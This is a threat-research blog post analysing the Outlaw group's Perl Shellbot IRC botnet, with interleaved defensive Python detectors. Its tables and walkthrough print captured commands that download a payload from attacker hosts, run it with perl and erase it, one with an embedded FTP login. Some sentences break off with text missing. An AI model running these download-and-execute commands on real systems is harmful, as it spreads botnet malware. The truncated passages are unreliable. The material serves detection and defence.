# Perl-Based Shellbot Looks to Target Organizations via C&C

Posted on: November 1, 2018 at 12:04 am
Posted in: Botnets, Internet of Things, Malware
Author: [Trend Micro Cyber Safety Solutions Team](https://blog.trendmicro.com/trendlabs-security-intelligence/author/cybersafety/)

We uncovered an operation by a hacking group we are naming "Outlaw" (the English translation of the Romanian word *haiduc*, the name of the hacking tool the group primarily uses). The operation involves an IRC bot built with the help of Perl Shellbot. The group distributes the bot by exploiting a common [command injection vulnerability](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-1000117) on internet of things (IoT) devices and Linux servers. Further research indicates that the threat can also affect Windows-based environments and even Android devices.

institution, as well as a Bangladeshi government site, over [a vulnerability in the Dovecot mail server](http://www.securiteam.com/unixfocus/6H00L0UHFC.html). They then used two compromised servers, linked as a high-availability cluster, to host an IRC bouncer that was used to command and control the emerging botnet.
Aside from finding several exploit files that allowed us to understand how the initial exploit on the first server worked, we also found configuration files of the [hackers' toolset that allowed them to target organizations](https://documents.trendmicro.com/assets/Perl-Based_Shellbot_Looks_to_Target_Organizations_via_C&C_appendix.pdf) through DoS and SSH brute force, using so-called "class files." This suggests that the threat actors were building a botnet for cybercriminal purposes. The operation particularly caught our attention after several of our honeypot sensors started to capture new injected commands:

| Source | Command |
|---|---|
| 107.1.153.75 | `uname -a; wget hxxp://54[.]37[.]72[.]170/n3; curl -O hxxp://54[.]37[.]72[.]170/n3; perl n3; rm -rf n3; rm -rf n3.*` |
| 195.154.43.102 | `uname -a; wget ftp://museum:museum04@153[.]122[.]156[.]232/Mail/n3; rm -rf n3; rm -rf n3.*` |
| 218.25.74.221 | `uname -a; wget hxxp://54[.]37[.]72[.]170/n3; curl -O hxxp://54[.]37[.]72[.]170/n3; perl n3; rm -rf n3; rm -rf n3.*` |
| 61.8.73.166 | `uname -a; wget hxxp://54[.]37[.]72[.]170/n3; curl -O hxxp://54[.]37[.]72[.]170/n3; perl n3; rm -rf n3; rm -rf n3.*` |
| 61.8.73.166 | `uname -a; wget hxxp://54[.]37[.]72[.]170/n3; curl -O hxxp://54[.]37[.]72[.]170/n3; perl n3; rm -rf n3; rm -rf n3.*;wget hxxp://54[.]37[.]72[.]170/n.tgz;tar -xzvf n.tgz;rm -rf n.tgz;cd .s;./run;cd /tmp` |
| 69.64.62.159 | `uname -a;cd /tmp;wget hxxp://54[.]37[.]72[.]170/n3;perl n3;rm -rf n3*` |

_Table 1. Commands we identified_
_Note: Source – source IP address that tried to inject the command; Command – command as captured by the honeypot sensor utility_

**Country**: Taiwan, Japan, United States, India, United Kingdom, Israel, Kuwait, Brazil, Colombia, Germany, Switzerland, Thailand, Bulgaria, Greece, Italy, Malaysia

_Table 2. Countries (based on Trend Micro Smart Protection Network feedback)_

The botnet itself is built with a Shellbot variant, a script written in Perl that is even available on GitHub.
The botnet was previously distributed via an exploit of the [Shellshock vulnerability, hence the name "Shellbot."](https://blog.trendmicro.com/trendlabs-security-intelligence/one-year-after-shellshock-are-your-servers-and-devices-safer/) This time, the threat actors mostly distribute it via previously brute-forced or compromised hosts. To look into the threat's behavior, we set up honeypots with several hosts:

- Host #1: An Ubuntu 16.04 host with a Splunk forwarder for monitoring
- Host #2: An Ubuntu 16.04 server with the Dovecot mail server installed
- Host #3: An Android device running Android 7, [one of the most popular versions, which can be easily rooted](https://developer.android.com/about/dashboards/)

We then monitored the C&C traffic and obtained the IRC channels' information. At the time of the first infection, around 142 hosts were present in the IRC channel.

### How it infects systems

A command is first run on the IoT device or server. In this example, the command `uname -a;cd /tmp;wget hxxp://54[.]37[.]72[.]170/n3;perl n3;rm -rf n3*` first verifies that the host accepts commands from the command-line interface (CLI) with `uname -a`. Once that command runs successfully, the working directory is changed to `/tmp`. The downloaded payload, the file n3 (detected by Trend Micro as [PERL_SHELLBOT.SM](https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/perl_shellbot.sm)), is then run with the Perl interpreter. In the final step of the chain, the n3 file is removed, so no trace of the download is left on disk (the running Perl process remains; see Figure 2).

_Figure 1. Actual payload, with filename n3_

Once the bot is installed, it starts to communicate with one of the C&C servers via IRC.

_Figure 2. The bot runs as "/usr/sbin/httpd"_

_Figure 3. Outgoing connection to one of the C&C servers, luci[.]madweb[.]ro_

The C&C connection attempt occurs right after the infection and is persistent. If connectivity is lost, the bot reconnects immediately once an internet connection is available again.
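The recon, download, execute and delete stages of the chain described above are easy to recognise mechanically once the injected one-liner is split into its parts. The following Python is an added example, not code from the post or from the Outlaw toolset: it takes command strings in the form captured in Table 1 (the defanged copies below are constructed from that table, plus one benign line), splits the chain, refangs the URLs, and reports which stages are present, any download URLs and embedded credentials (such as the FTP login in the second row), and the files that the final `rm` removes. The stage names and the `suspicious` rule are the example's own choices.

```python
import re
from urllib.parse import urlsplit

# Constructed copies of commands from Table 1 (defanged as the post prints
# them) plus one benign line; not live honeypot data.
SAMPLE_COMMANDS = [
    "uname -a; wget hxxp://54[.]37[.]72[.]170/n3; curl -O hxxp://54[.]37[.]72[.]170/n3; "
    "perl n3; rm -rf n3; rm -rf n3.*",
    "uname -a; wget ftp://museum:museum04@153[.]122[.]156[.]232/Mail/n3; rm -rf n3; rm -rf n3.*",
    "uname -a;cd /tmp;wget hxxp://54[.]37[.]72[.]170/n3;perl n3;rm -rf n3*",
    "ls -la /var/log",
]

DOWNLOADERS = {"wget", "curl", "fetch", "tftp"}
INTERPRETERS = {"perl", "python", "sh", "bash", "php"}
URL_RE = re.compile(r"(?:h[xt]{2}ps?|ftp)://\S+")


def refang(url):
    """Turn the post's defanged notation back into a parseable URL."""
    return url.replace("hxxp", "http").replace("[.]", ".")


def split_chain(cmd):
    """Split a shell one-liner on ; && || and | (these injections use no quoting)."""
    return [p.strip() for p in re.split(r"\s*(?:;|&&|\|\||\|)\s*", cmd) if p.strip()]


def analyse(cmd):
    """Classify one injected command into recon/download/execute/cleanup stages."""
    stages = {"recon": False, "download": False, "execute": False, "cleanup": False}
    urls, creds, artefacts = [], [], set()
    for part in split_chain(cmd):
        argv = part.split()
        head = argv[0]
        if head == "uname":
            stages["recon"] = True
        elif head in DOWNLOADERS:
            stages["download"] = True
            for found in URL_RE.findall(part):
                url = refang(found)
                urls.append(url)
                parts = urlsplit(url)
                if parts.username:                      # e.g. ftp://museum:museum04@...
                    creds.append((parts.username, parts.password, parts.hostname))
                artefacts.add(parts.path.rsplit("/", 1)[-1])   # file that lands on disk
        elif head in INTERPRETERS and len(argv) > 1:
            stages["execute"] = True
            artefacts.add(argv[-1])
        elif head == "rm":
            # rm -rf n3 / n3.* / n3* all target the fetched file
            targets = [a.rstrip("*.") for a in argv[1:] if not a.startswith("-")]
            if any(t in artefacts for t in targets):
                stages["cleanup"] = True
    return {
        "stages": stages,
        "urls": urls,
        "credentials": creds,
        "artefacts": sorted(artefacts),
        # a download followed by running or deleting the payload is the
        # pattern every row of Table 1 shares
        "suspicious": stages["download"] and (stages["execute"] or stages["cleanup"]),
    }


def triage(commands=SAMPLE_COMMANDS):
    """Return the analyses of the commands that match the dropper pattern."""
    return [r for r in map(analyse, commands) if r["suspicious"]]


if __name__ == "__main__":
    for hit in triage():
        print(hit["urls"], hit["credentials"], hit["stages"])
```

Feeding the captured command column of a honeypot or shell-audit log through `triage` gives the download hosts and any credentials embedded in the URLs, which is what the authors used later to retrieve the actors' files.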
At this stage, restarting the infected machine

hosts. Reconstructed Transmission Control Protocol (TCP) streams show in clear text the download of the malicious file and the subsequent communication with the C&C servers.

### Captured network traffic during the infection

A TCP stream from a traffic capture between the infected host and the C&C server at the time of infection (below) shows that the n3 file was downloaded and then run on the target system.

_Figure 4. TCP stream from network traffic between the infected host and C&C server_

_Figure 5. TCP communication stream after the infection_

After the infection, the communication shows that the bot joined the IRC channel and was assigned a nickname and server configuration information. Modifying Domain Name System (DNS) settings confirms that a real target is involved (not just the honeypot) and that it has visibility to the internet. The bot also reports the number of processor cores and the type of processor. It also discloses that Splunk is running on the host, using the command `cat /etc/passwd` with filtered output; this notifies the channel admins that the target device is being monitored or has an antivirus (AV) solution installed. This is followed by PING/PONG communication (the IRC server periodically sends a PING message that requires a PONG response to avoid being disconnected) to keep the communication channel open.

_Figure 6. Separate information is sent to IRC admins_

Shellbot takes its process name from a hardcoded list when it runs. These names help hide the running bot from system admins, security monitoring, and researchers.

_Figure 7. Screenshot from Shellbot's configuration file with the available process names_

Once Shellbot is running on a target system, the administrator of the IRC channel can send various commands to the host.
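A renamed process still has to be executed by something, and on Linux the kernel records that: `/proc/<pid>/cmdline` holds whatever name the bot gave itself (which is what ps and top display), while `/proc/<pid>/exe` still points at the Perl interpreter. The following Python is an added example, not the post's or the bot's code: it checks a process record for that mismatch, for a disguise name such as the `/usr/sbin/httpd` of Figure 2 (the rest of the bot's list is only shown as a screenshot, so the set below is an assumption), and for a working directory under /tmp, and includes a `/proc` walker for a live host. The process records are constructed.

```python
import os

# "/usr/sbin/httpd" is the disguise in Figure 2; the other names are assumed
# for the example, since the bot's full list is only shown as a screenshot.
DISGUISES = {"/usr/sbin/httpd", "httpd", "/usr/sbin/sshd", "sshd", "/usr/sbin/cron"}
INTERPRETERS = {"perl", "python", "python2", "python3", "sh", "bash", "php"}
SCRATCH_DIRS = ("/tmp", "/var/tmp", "/dev/shm")


def check_process(argv0, exe, cwd="/"):
    """Return the reasons a process looks like a renamed script bot (empty if none).

    argv0 -- first field of /proc/<pid>/cmdline, i.e. what ps and top display
    exe   -- target of the /proc/<pid>/exe symlink, i.e. the binary really running
    cwd   -- target of /proc/<pid>/cwd
    """
    reasons = []
    exe_base = os.path.basename(exe).replace(" (deleted)", "")
    if exe_base in INTERPRETERS and os.path.basename(argv0) not in INTERPRETERS:
        reasons.append("argv[0] is %r but the executable is %s" % (argv0, exe))
    if argv0 in DISGUISES and os.path.basename(argv0) != exe_base:
        reasons.append("claims to be %s, which is not the running binary" % argv0)
    if cwd.startswith(SCRATCH_DIRS):
        reasons.append("working directory is %s" % cwd)
    return reasons


# Constructed process records modelled on Figure 2: (pid, argv0, exe, cwd).
SAMPLE_PROCESSES = [
    (1320, "/usr/sbin/httpd", "/usr/bin/perl", "/tmp"),   # the bot
    (812, "/usr/sbin/sshd", "/usr/sbin/sshd", "/"),        # real daemon
    (2210, "perl", "/usr/bin/perl", "/home/ops"),          # honest perl script
]


def suspects(records=SAMPLE_PROCESSES):
    """Map pid -> reasons for every record that trips at least one check."""
    out = {}
    for pid, argv0, exe, cwd in records:
        reasons = check_process(argv0, exe, cwd)
        if reasons:
            out[pid] = reasons
    return out


def scan_proc():
    """Walk /proc on a live Linux host and yield (pid, reasons) for suspects."""
    for pid in filter(str.isdigit, os.listdir("/proc")):
        try:
            with open("/proc/%s/cmdline" % pid, "rb") as f:
                argv0 = f.read().split(b"\0", 1)[0].decode("utf-8", "replace")
            exe = os.readlink("/proc/%s/exe" % pid)
            cwd = os.readlink("/proc/%s/cwd" % pid)
        except OSError:
            continue            # kernel thread, or a process we may not inspect
        reasons = check_process(argv0, exe, cwd)
        if reasons:
            yield int(pid), reasons


if __name__ == "__main__":
    for pid, reasons in suspects().items():
        print(pid, reasons)
```

`scan_proc` needs to run as root to read `exe` and `cwd` of other users' processes; a perl process whose `argv[0]` has been rewritten to a daemon name is the signature of Figure 2, whatever name the bot picked from its list.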
The list includes commands to perform a port scan, perform various forms of distributed denial of service (DDoS), download a file, get information about other machines, or just send the operating system (OS) information and a list of certain running processes to the C&C server.

### Possible script functions an IRC command can call

_Figure 8. Screenshot of script header with list of available commands_

Some of the IRC-related [functions seen to have been used were join, part, rejoin, op, deop, voice, devoice, nick, msg, quit, raw, and die](https://gist.github.com/xero/2d6e4b061b4ecbeb9f99). DDoS-related activity targets User Datagram Protocol (UDP), TCP, and HTTP traffic. If a port scan is invoked, the bot always scans the following ports:

```text
1 7 9 14 20 21 22 23 25 53 80 88 110 112 113 137 143 145 222 333 405 443 444 445 512 587 616 666 993 995
1024 1025 1080 1144 1156 1222 1230 1337 1348 1628 1641 1720 1723 1763 1983 1984 1985 1987 1988 1990 1994
2005 2020 2121 2200 2222 2223 2345 2360 2500 2727 3130 3128 3137 3129 3303 3306 3333 3389 4000 4001 4471
4877 5252 5522 5553 5554 5642 5777 5800 5801 5900 5901 6062 6550 6522 6600 6622 6662 6665 6666 6667 6969
7000 7979 8008 8080 8081 8082 8181 8246 8443 8520 8787 8855 8880 8989 9855 9865 9997 9999 10000 10001
10010 10222 11170 11306 11444 12241 12312 14534 14568 15951 17272 19635 19906 19900 20000 21412 21443
21205 22022 30999 31336 31337 32768 33180 35651 36666 37998 41114 41215 44544 45055 45555 45678 51114
51247 51234 55066 55555 65114 65156 65120 65410 65500 65501 65523 65533
```

_Table 3. Ports scanned by the bot_

### Sample of network communication captured on infected hosts

This network communication seems to be the output of an [XMR rig mining monitoring tool](https://forums.servethehome.com/index.php?threads/sth-xmrig-monero-mining-docker-image.17049/page-2). Code of the tool, as captured (the lines between the `echo` and the `rm` are missing from the capture):

```sh
root@ubuntu:~$ cat speed.sh
i=1
result=`docker ps -q | wc -l`
while [ "$i" -le "$result" ]
do
echo "miner numa $i speed"
rm /tmp/minernuma$i.tmp
i=$(($i + 1))
done
```

### Reconstructed TCP streams from the traffic capture of C&C commands

The infected host is always assigned a nickname of "sEx" followed by a randomly generated integer. In this example, the host nickname is "sEx-3635".

_Figure 9. TCP stream with a sample host nickname_

All infected hosts also showed the basic C&C connection in the form of PING/PONG traffic, occasionally asked for updates, and provided some host information, such as suspicious crontab-like records and the process identifier (PID) of the sd-pam process of the user who was running the IRC bot on the system. The following is the information exchange about a host, possibly a new joiner of the botnet or another target scanned indirectly through the zombie hosts (the infected host in this case):

_Figure 10. Host information exchange TCP stream_

_Figure 11. One of the spotted identities linked to compromised servers_

During the traffic monitoring, several identities such as luci, lucian, dragos, mazy, hydra, and poseidon were spotted in the IRC communication channels. These identities were also found as usernames on a compromised Japanese server. This server seemed to have

the following example:

_Figure 12. Dragos SSH login_

Using the credentials from one of the commands injected into the honeypots, we were able to download the files that the threat actors used. The files' contents often changed on the server (some were deleted, while others were added).
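Because the port list in Table 3 is hardcoded, a scan from an infected host has a recognisable shape: many distinct destination ports on one target, nearly all of them drawn from that list. The following Python is an added example, not something the post provides: it groups connection attempts from netfilter-style log lines by source and destination, measures how much of each pair's distinct port set falls inside the bot's list, and flags pairs above a threshold. The log format, the sample lines and the thresholds are constructed for the example; the port set itself is copied from Table 3.

```python
import re
from collections import defaultdict

# The bot's hardcoded scan list from Table 3, copied from the post.
SHELLBOT_PORTS = frozenset([
    1, 7, 9, 14, 20, 21, 22, 23, 25, 53, 80, 88, 110, 112, 113, 137, 143, 145,
    222, 333, 405, 443, 444, 445, 512, 587, 616, 666, 993, 995, 1024, 1025,
    1080, 1144, 1156, 1222, 1230, 1337, 1348, 1628, 1641, 1720, 1723, 1763,
    1983, 1984, 1985, 1987, 1988, 1990, 1994, 2005, 2020, 2121, 2200, 2222,
    2223, 2345, 2360, 2500, 2727, 3130, 3128, 3137, 3129, 3303, 3306, 3333,
    3389, 4000, 4001, 4471, 4877, 5252, 5522, 5553, 5554, 5642, 5777, 5800,
    5801, 5900, 5901, 6062, 6550, 6522, 6600, 6622, 6662, 6665, 6666, 6667,
    6969, 7000, 7979, 8008, 8080, 8081, 8082, 8181, 8246, 8443, 8520, 8787,
    8855, 8880, 8989, 9855, 9865, 9997, 9999, 10000, 10001, 10010, 10222,
    11170, 11306, 11444, 12241, 12312, 14534, 14568, 15951, 17272, 19635,
    19906, 19900, 20000, 21412, 21443, 21205, 22022, 30999, 31336, 31337,
    32768, 33180, 35651, 36666, 37998, 41114, 41215, 44544, 45055, 45555,
    45678, 51114, 51247, 51234, 55066, 55555, 65114, 65156, 65120, 65410,
    65500, 65501, 65523, 65533,
])

# Fields of a netfilter "LOG" target line (iptables/ufw); netflow or Zeek
# conn.log sources only need a different regex.
LOG_RE = re.compile(r"SRC=(?P<src>\S+) DST=(?P<dst>\S+) .*?DPT=(?P<dpt>\d+)")


def scan_candidates(lines, min_ports=20, min_overlap=0.9):
    """Group connection attempts by (src, dst) and flag pairs whose distinct
    destination ports are mostly drawn from the bot's list."""
    seen = defaultdict(set)
    for line in lines:
        m = LOG_RE.search(line)
        if m:
            seen[(m.group("src"), m.group("dst"))].add(int(m.group("dpt")))
    flagged = {}
    for pair, ports in seen.items():
        hits = ports & SHELLBOT_PORTS
        overlap = len(hits) / len(ports)
        if len(hits) >= min_ports and overlap >= min_overlap:
            flagged[pair] = {"distinct": len(ports), "on_list": len(hits),
                             "overlap": round(overlap, 2)}
    return flagged


def build_sample():
    """Constructed log lines (not from the post): one host sweeping the first
    45 ports of the bot's list plus two strays, and one ordinary client."""
    fmt = ("Oct 24 09:12:01 gw kernel: IN=eth0 SRC={src} DST=10.0.0.9 "
           "PROTO=TCP SPT=40123 DPT={dpt}")
    lines = [fmt.format(src="10.0.0.5", dpt=p)
             for p in sorted(SHELLBOT_PORTS)[:45] + [8, 15]]
    lines += [fmt.format(src="10.0.0.7", dpt=p) for p in (22, 80, 443, 3306, 8080)]
    return lines


if __name__ == "__main__":
    for pair, info in scan_candidates(build_sample()).items():
        print("%s -> %s: %s" % (pair[0], pair[1], info))
```

The overlap ratio is what separates this from a generic port-scan alert: a nmap default sweep also hits many ports, but its set is the 1000 most common ones, so the fraction landing inside Table 3 stays well under 0.9. Tune `min_ports` to the logging window you have; 20 is a conservative floor for a 159-port list.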
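Figures 5, 6 and 9 show the C&C session as a plain-text IRC exchange: registration with a `sEx-<number>` nickname, a JOIN to the channel, the PING/PONG keepalive, host reports from the bot and operator messages in the channel. The following Python is an added example (not the post's or the bot's code) that parses such a reconstructed stream and pulls out those indicators; it serves both the C&C description under "Captured network traffic during the infection" and the nickname pattern of Figure 9. The stream below is constructed in standard IRC wire format (RFC 1459); the server name, channel name, host line and the operator's instruction are placeholders, since the post shows the real ones only in screenshots.

```python
import re

BOT_NICK_RE = re.compile(r"^sEx-\d+$")      # nickname pattern from Figure 9

# Constructed session in RFC 1459 wire format; server, channel, host report
# and the operator's instruction are placeholders, not values from the post.
SAMPLE_STREAM = [
    "NICK sEx-3635",
    "USER sex-3635 8 * :sex",
    ":irc.example.test 001 sEx-3635 :Welcome to the network",
    ":sEx-3635!~sex@203.0.113.7 JOIN :#placeholder",
    ":sEx-3635!~sex@203.0.113.7 PRIVMSG #placeholder :Linux ubuntu 4.4.0-131-generic x86_64",
    "PING :irc.example.test",
    "PONG :irc.example.test",
    ":luci!~luci@198.51.100.9 PRIVMSG #placeholder :portscan 192.0.2.10",
    "PING :irc.example.test",
    "PONG :irc.example.test",
]


def parse_irc_line(line):
    """Split one IRC line into (prefix, COMMAND, params); the trailing
    parameter after ' :' may contain spaces."""
    prefix = None
    if line.startswith(":"):
        prefix, _, line = line[1:].partition(" ")
    head, sep, trailing = line.partition(" :")
    params = head.split()
    if sep:
        params.append(trailing)
    if not params:
        return prefix, "", []
    return prefix, params[0].upper(), params[1:]


def summarise_stream(lines):
    """Extract Shellbot indicators from a reconstructed C&C stream."""
    s = {"bot_nicks": set(), "channels": set(), "operators": set(),
         "bot_reports": [], "instructions": [], "ping": 0, "pong": 0}
    for raw in lines:
        line = raw.rstrip("\r\n")
        if not line:
            continue
        prefix, cmd, params = parse_irc_line(line)
        nick = prefix.split("!", 1)[0] if prefix else None
        from_bot = bool(nick and BOT_NICK_RE.match(nick))
        if cmd == "NICK" and params and BOT_NICK_RE.match(params[-1]):
            s["bot_nicks"].add(params[-1])
        elif cmd == "JOIN" and params and from_bot:
            s["channels"].add(params[-1])
        elif cmd == "PING":
            s["ping"] += 1
        elif cmd == "PONG":
            s["pong"] += 1
        elif cmd == "PRIVMSG" and len(params) == 2 and nick:
            if from_bot:
                s["bot_reports"].append(params[1])          # e.g. uname -a output
            else:
                s["operators"].add(nick)
                s["instructions"].append((nick, params[0], params[1]))
    s["is_shellbot"] = bool(s["bot_nicks"] and s["channels"])
    return s


if __name__ == "__main__":
    summary = summarise_stream(SAMPLE_STREAM)
    print("bot nicks:", summary["bot_nicks"], "channels:", summary["channels"])
    print("operators:", summary["operators"],
          "keepalives:", summary["ping"], summary["pong"])
```

The input is the text of a reassembled TCP stream (for example the "Follow TCP stream" export of a capture), one IRC line per element. Since the bot's traffic is unencrypted, the same parser can run on a network sensor to raise an alert on the first `NICK sEx-…` registration rather than waiting for the port scan or DDoS command.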
According to the time correlation, activity mostly happened in the daytime (Central European Time, CET), during business hours. It never happened at night or on weekends, suggesting that the threat actors operated during regular working hours.

Find a more extensive run-through of this operation, such as how the IRC bouncer contained comments in Romanian, the hacking tools used, exploits related to Ubuntu, and the indicators of compromise (IoCs), in the **[Appendix](https://documents.trendmicro.com/assets/Perl-Based_Shellbot_Looks_to_Target_Organizations_via_C&C_appendix.pdf)**.

### Preventing compromise from malicious bot-related activities

The Outlaw group used an IRC bot, which isn't a novel threat. The code is available online, making it possible to build such a bot (with a fully undetectable toolset) and operate it under the radar of common network security solutions. Additionally, in this particular operation, the attackers looked into targeting big companies. While we haven't seen widespread attacks from this hacking group, it is important to adopt security measures that can defend systems against potential attacks, such as:

- Setting up the SSH login process properly. Do not leave it open to public networks unless your infrastructure requires it. Many devices run an SSH service by default, unnecessarily, with default credentials. This is particularly true of network infrastructure devices like switches and firewalls.
- Monitoring the commands run on the CLI of your systems.
- Monitoring non-DNS traffic to and from port 53.
- Detecting the creation of new accounts and regularly verifying that all accounts are used only for business purposes.
- Restricting the use of FTP as much as possible. Not only does it transfer passwords in clear text, it is also commonly used for loading exploit files onto local systems. The same goes for web directories.
Any newly created file should be considered suspicious unless it is in a folder intended for it.
- Reconsidering the use of the Dovecot mail server, as it has been found to have a buffer overflow vulnerability. Patch it, or at least monitor its file directory for unusual files.
- Maintaining a mailbox, a contact person, or at least a contact form on your website for reporting possible abuse or security compromise.

Users can also consider adopting security solutions that provide protection from malicious bot-related activities through a cross-generational blend of threat defense techniques. [Trend Micro™ XGen™ security](https://www.trendmicro.com/en_us/business/products/all-solutions.html) provides high-fidelity machine learning that can secure the [gateway](https://www.trendmicro.com/en_us/business/products/user-protection/sps.html) and [endpoints](https://www.trendmicro.com/en_us/business/products/user-protection/sps.html), and protect physical, virtual, and cloud workloads. With technologies that employ web/URL filtering, behavioral analysis, and custom sandboxing, XGen security offers protection against ever-changing threats that bypass traditional controls and exploit known and unknown vulnerabilities.
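For the first recommendation above, the settings that matter on an OpenSSH server come down to a handful of `sshd_config` directives. The following Python is an added example, not something the post provides: it parses the global section of an `sshd_config` (stopping at the first `Match` block, whose values are conditional, and honouring sshd's rule that the first occurrence of a directive wins), fills in OpenSSH 7.x defaults for anything unset or commented out, and reports directives that still allow root or password logins or generous retry counts. The weak and hardened configurations are constructed; the thresholds are the example's own.

```python
import re

# OpenSSH 7.x defaults for the directives checked (used when a line is
# absent or commented out).
DEFAULTS = {
    "permitrootlogin": "prohibit-password",
    "passwordauthentication": "yes",
    "pubkeyauthentication": "yes",
    "permitemptypasswords": "no",
    "maxauthtries": "6",
}
# Values this example insists on; "prohibit-password" still lets root in
# with a key, so it is treated as a finding here.
WANT = {
    "permitrootlogin": ("no",),
    "passwordauthentication": ("no",),
    "pubkeyauthentication": ("yes",),
    "permitemptypasswords": ("no",),
}
MAX_AUTH_TRIES = 4


def parse_global(text):
    """Return {directive: value} for the global section of an sshd_config."""
    conf = {}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()               # drop comments
        if not line:
            continue
        parts = re.split(r"[ \t=]+", line, maxsplit=1)    # "Key value" or "Key=value"
        if len(parts) != 2:
            continue
        key, value = parts[0].lower(), parts[1].strip()
        if key == "match":
            break                                         # conditional section starts
        conf.setdefault(key, value)                       # sshd keeps the first occurrence
    return conf


def audit(text):
    """List (directive, effective value, expected) for every weak setting."""
    conf = parse_global(text)
    findings = []
    for key, allowed in WANT.items():
        value = conf.get(key, DEFAULTS[key]).lower()
        if value not in allowed:
            findings.append((key, value, "/".join(allowed)))
    tries = int(conf.get("maxauthtries", DEFAULTS["maxauthtries"]))
    if tries > MAX_AUTH_TRIES:
        findings.append(("maxauthtries", str(tries), "<= %d" % MAX_AUTH_TRIES))
    return findings


# Constructed configurations, not taken from any host in the post.
WEAK_CONFIG = """\
Port 22
PermitRootLogin yes
PasswordAuthentication yes
#PubkeyAuthentication yes
MaxAuthTries 10
Match User backup
    PasswordAuthentication no
"""

HARDENED_CONFIG = """\
Port 22
PermitRootLogin no
PasswordAuthentication no
PubkeyAuthentication yes
PermitEmptyPasswords no
MaxAuthTries 3
AllowUsers ops
"""


if __name__ == "__main__":
    for finding in audit(WEAK_CONFIG):
        print("%s = %s (want %s)" % finding)
    print("hardened findings:", audit(HARDENED_CONFIG))
```

Run `audit(open("/etc/ssh/sshd_config").read())` on a host and confirm the effective values with `sshd -T`, which prints the configuration sshd actually applies, including included files and the defaults of the installed version. A firewall rule limiting who can reach port 22 is still the first line of defence; this check only covers what to do when the service must stay reachable.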
XGen security also powers Trend Micro's suite of security solutions: [Hybrid Cloud Security](https://www.trendmicro.com/en_us/business/products/hybrid-cloud/cloud-security.html), User Protection, and [Network Defense](https://www.trendmicro.com/en_us/business/products/network.html).

Tags: android, IoT, IRC bot, Linux, Windows